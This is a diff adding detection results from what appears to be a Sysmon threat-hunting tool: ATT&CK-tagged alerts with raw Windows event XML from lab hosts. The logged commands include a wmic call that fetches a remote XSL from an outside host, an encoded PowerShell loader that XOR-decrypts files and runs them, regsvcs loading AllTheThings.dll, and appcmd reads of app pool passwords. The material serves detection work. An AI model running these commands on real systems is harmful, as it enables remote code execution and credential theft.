+    <Data Name=""Hashes"">SHA1=922AF00065798A27238A6AE544BE314A3C3C7479,MD5=F3E69E053D4FA762A663ED7B77A5F4DD,SHA256=5D39A09D13D6085EDA7767771268E59888DE7ACE54E6DC9CA1B023E080254BCF,IMPHASH=B9E4EE1E8A5256343DE29E67C1CB41FA</Data>
+    <Data Name=""Signed"">true</Data>
+    <Data Name=""Signature"">Microsoft Windows</Data>
+    <Data Name=""SignatureStatus"">Valid</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1003] Processes opening handles and accessing Lsass with potential dlls in memory,1555606693.650211,2019-04-18T20:58:13.650211+04:00,,Threat,High,[T1003] Processes opening handles and accessing Lsass with potential dlls in memory,7,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>7</EventID>
+    <Version>3</Version>
+    <Level>4</Level>
+    <Task>7</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-04-18T16:58:13.389836Z"">
+    </TimeCreated>
+    <EventRecordID>19</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""3192"" ThreadID=""164"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName"">technique_id=T1003,technique_name=Credential Dumping</Data>
+    <Data Name=""UtcTime"">2019-04-18 16:58:13.309</Data>
+    <Data Name=""ProcessGuid"">365ABB72-AC28-5CB8-0000-0010F3F70700</Data>
+    <Data Name=""ProcessId"">1200</Data>
+    <Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ImageLoaded"">C:\Windows\System32\samlib.dll</Data>
+    <Data Name=""FileVersion"">6.1.7601.23677 (win7sp1_ldr.170209-0600)</Data>
+    <Data Name=""Description"">SAM Library DLL</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""Hashes"">SHA1=922AF00065798A27238A6AE544BE314A3C3C7479,MD5=F3E69E053D4FA762A663ED7B77A5F4DD,SHA256=5D39A09D13D6085EDA7767771268E59888DE7ACE54E6DC9CA1B023E080254BCF,IMPHASH=B9E4EE1E8A5256343DE29E67C1CB41FA</Data>
+    <Data Name=""Signed"">true</Data>
+    <Data Name=""Signature"">Microsoft Windows</Data>
+    <Data Name=""SignatureStatus"">Valid</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1556380673.931363,2019-04-27T19:57:53.931363+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /A ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-04-27T15:57:53.931363Z"">
+    </TimeCreated>
+    <EventRecordID>6594</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""1912"" ThreadID=""996"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName"">technique_id=T1059,technique_name=Command-Line Interface</Data>
+    <Data Name=""UtcTime"">2019-04-27 15:57:53.806</Data>
+    <Data Name=""ProcessGuid"">365ABB72-7C01-5CC4-0000-00105C5C0C00</Data>
+    <Data Name=""ProcessId"">3076</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">cmd.exe /A</Data>
+    <Data Name=""CurrentDirectory"">C:\Users\IEUser\AppData\Roaming\</Data>
+    <Data Name=""User"">IEWIN7\IEUser</Data>
+    <Data Name=""LogonGuid"">365ABB72-7AB1-5CC4-0000-0020BEF40000</Data>
+    <Data Name=""LogonId"">0xf4be</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-7C01-5CC4-0000-0010F9530C00</Data>
+    <Data Name=""ParentProcessId"">2992</Data>
+    <Data Name=""ParentImage"">C:\Users\IEUser\AppData\Roaming\NvSmart.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Users\IEUser\AppData\Roaming\NvSmart.exe&quot; </Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1558920558.43237,2019-05-27T05:29:18.432370+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( &quot;C:\Windows\System32\inetsrv\appcmd.exe&quot;  list apppool /text:processmodel.username ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-27T01:29:18.432370Z"">
+    </TimeCreated>
+    <EventRecordID>5925</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""324"" ThreadID=""2260"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-27 01:29:18.392</Data>
+    <Data Name=""ProcessGuid"">365ABB72-3D6E-5CEB-0000-00100C96FF00</Data>
+    <Data Name=""ProcessId"">3136</Data>
+    <Data Name=""Image"">C:\Windows\System32\inetsrv\appcmd.exe</Data>
+    <Data Name=""FileVersion"">7.5.7600.16385 (win7_rtm.090713-1255)</Data>
+    <Data Name=""Description"">Application Server Command Line Admin Tool</Data>
+    <Data Name=""Product"">Internet Information Services</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\System32\inetsrv\appcmd.exe&quot;  list apppool /text:processmodel.username</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\Temp\</Data>
+    <Data Name=""User"">IIS APPPOOL\DefaultAppPool</Data>
+    <Data Name=""LogonGuid"">365ABB72-B26B-5CEA-0000-002023240800</Data>
+    <Data Name=""LogonId"">0x82423</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-3D4A-5CEB-0000-0010FA93FD00</Data>
+    <Data Name=""ParentProcessId"">2584</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot;  -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1558633564.671625,2019-05-23T21:46:04.671625+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-23T17:45:34.538296Z"">
+    </TimeCreated>
+    <EventRecordID>1025</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2032"" ThreadID=""2092"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-23 17:45:34.528</Data>
+    <Data Name=""ProcessGuid"">365ABB72-DC3E-5CE6-0000-00102BC97200</Data>
+    <Data Name=""ProcessId"">712</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; </Data>
+    <Data Name=""CurrentDirectory"">C:\Users\IEUser\</Data>
+    <Data Name=""User"">IEWIN7\IEUser</Data>
+    <Data Name=""LogonGuid"">365ABB72-CE6C-5CE6-0000-002047F30000</Data>
+    <Data Name=""LogonId"">0xf347</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-CE6D-5CE6-0000-00109E190100</Data>
+    <Data Name=""ParentProcessId"">1472</Data>
+    <Data Name=""ParentImage"">C:\Windows\explorer.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\Explorer.EXE</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1558630149.576625,2019-05-23T20:49:09.576625+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\System32\cmd.exe&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-23T16:49:08.422099Z"">
+    </TimeCreated>
+    <EventRecordID>896</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2032"" ThreadID=""2092"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-23 16:49:08.258</Data>
+    <Data Name=""ProcessGuid"">365ABB72-CF04-5CE6-0000-001010F20C00</Data>
+    <Data Name=""ProcessId"">4056</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; </Data>
+    <Data Name=""CurrentDirectory"">c:\</Data>
+    <Data Name=""User"">IEWIN7\IEUser</Data>
+    <Data Name=""LogonGuid"">365ABB72-CE6C-5CE6-0000-002047F30000</Data>
+    <Data Name=""LogonId"">0xf347</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-CF01-5CE6-0000-00105DA50C00</Data>
+    <Data Name=""ParentProcessId"">3872</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\wbem\WMIC.exe</Data>
+    <Data Name=""ParentCommandLine"">wmic  process list /format:&quot;https://a.uguu.se/x50IGVBRfr55_test.xsl&quot;</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1564436009.646278,2019-07-30T01:33:29.646278+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd  /c C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regsvcs.exe AllTheThings.dll ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-29T21:33:29.565736Z"">
+    </TimeCreated>
+    <EventRecordID>4919</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2640"" ThreadID=""3476"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-29 21:33:28.756</Data>
+    <Data Name=""ProcessGuid"">747F3D96-6628-5D3F-0000-0010B1968800</Data>
+    <Data Name=""ProcessId"">5708</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">cmd  /c C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regsvcs.exe AllTheThings.dll</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
+    <Data Name=""LogonId"">0x413182</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-6609-5D3F-0000-00109FBF8500</Data>
+    <Data Name=""ParentProcessId"">1208</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; /C &quot;C:\ProgramData\ssh\runtests.bat&quot; </Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[  T1003 ] Credential Dumping ImageLoad,1555606693.389836,2019-04-18T20:58:13.389836+04:00,,Threat,Medium,[  T1003 ] Credential Dumping ImageLoad,7,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>7</EventID>
+    <Version>3</Version>
+    <Level>4</Level>
+    <Task>7</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-04-18T16:58:12.979246Z"">
+    </TimeCreated>
+    <EventRecordID>18</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""3192"" ThreadID=""164"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName"">technique_id=T1003,technique_name=Credential Dumping</Data>
+    <Data Name=""UtcTime"">2019-04-18 16:58:12.919</Data>
+    <Data Name=""ProcessGuid"">365ABB72-AC28-5CB8-0000-0010F3F70700</Data>
+    <Data Name=""ProcessId"">1200</Data>
+    <Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ImageLoaded"">C:\Windows\System32\cryptdll.dll</Data>
+    <Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
+    <Data Name=""Description"">Cryptography Manager</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""Hashes"">SHA1=C92A5E9D00AAC177C859B40247787E21D2483610,MD5=1128637CAD49A8E3C8B5FA5D0A061525,SHA256=6B80E50D8296F9E2C978CC6BC002B964ACFD8F4BCF623F4770513792845B5278,IMPHASH=CBB91DBEF75B54D8F20A2EC3E1BC8AC2</Data>
+    <Data Name=""Signed"">true</Data>
+    <Data Name=""Signature"">Microsoft Windows</Data>
+    <Data Name=""SignatureStatus"">Valid</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1003] Processes opening handles and accessing Lsass with potential dlls in memory,1555606693.389836,2019-04-18T20:58:13.389836+04:00,,Threat,High,[T1003] Processes opening handles and accessing Lsass with potential dlls in memory,7,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>7</EventID>
+    <Version>3</Version>
+    <Level>4</Level>
+    <Task>7</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-04-18T16:58:12.979246Z"">
+    </TimeCreated>
+    <EventRecordID>18</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""3192"" ThreadID=""164"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName"">technique_id=T1003,technique_name=Credential Dumping</Data>
+    <Data Name=""UtcTime"">2019-04-18 16:58:12.919</Data>
+    <Data Name=""ProcessGuid"">365ABB72-AC28-5CB8-0000-0010F3F70700</Data>
+    <Data Name=""ProcessId"">1200</Data>
+    <Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ImageLoaded"">C:\Windows\System32\cryptdll.dll</Data>
+    <Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
+    <Data Name=""Description"">Cryptography Manager</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""Hashes"">SHA1=C92A5E9D00AAC177C859B40247787E21D2483610,MD5=1128637CAD49A8E3C8B5FA5D0A061525,SHA256=6B80E50D8296F9E2C978CC6BC002B964ACFD8F4BCF623F4770513792845B5278,IMPHASH=CBB91DBEF75B54D8F20A2EC3E1BC8AC2</Data>
+    <Data Name=""Signed"">true</Data>
+    <Data Name=""Signature"">Microsoft Windows</Data>
+    <Data Name=""SignatureStatus"">Valid</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1558920558.352255,2019-05-27T05:29:18.352255+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( &quot;C:\Windows\System32\inetsrv\appcmd.exe&quot;  list apppool &quot;Description: Cannot read configuration file due to insufficient permissions&quot; /text:processmodel.password ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-27T01:29:18.352255Z"">
+    </TimeCreated>
+    <EventRecordID>5922</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""324"" ThreadID=""2260"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-27 01:29:18.322</Data>
+    <Data Name=""ProcessGuid"">365ABB72-3D6E-5CEB-0000-00104C92FF00</Data>
+    <Data Name=""ProcessId"">3100</Data>
+    <Data Name=""Image"">C:\Windows\System32\inetsrv\appcmd.exe</Data>
+    <Data Name=""FileVersion"">7.5.7600.16385 (win7_rtm.090713-1255)</Data>
+    <Data Name=""Description"">Application Server Command Line Admin Tool</Data>
+    <Data Name=""Product"">Internet Information Services</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\System32\inetsrv\appcmd.exe&quot;  list apppool &quot;Description: Cannot read configuration file due to insufficient permissions&quot; /text:processmodel.password</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\Temp\</Data>
+    <Data Name=""User"">IIS APPPOOL\DefaultAppPool</Data>
+    <Data Name=""LogonGuid"">365ABB72-B26B-5CEA-0000-002023240800</Data>
+    <Data Name=""LogonId"">0x82423</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-3D4A-5CEB-0000-0010FA93FD00</Data>
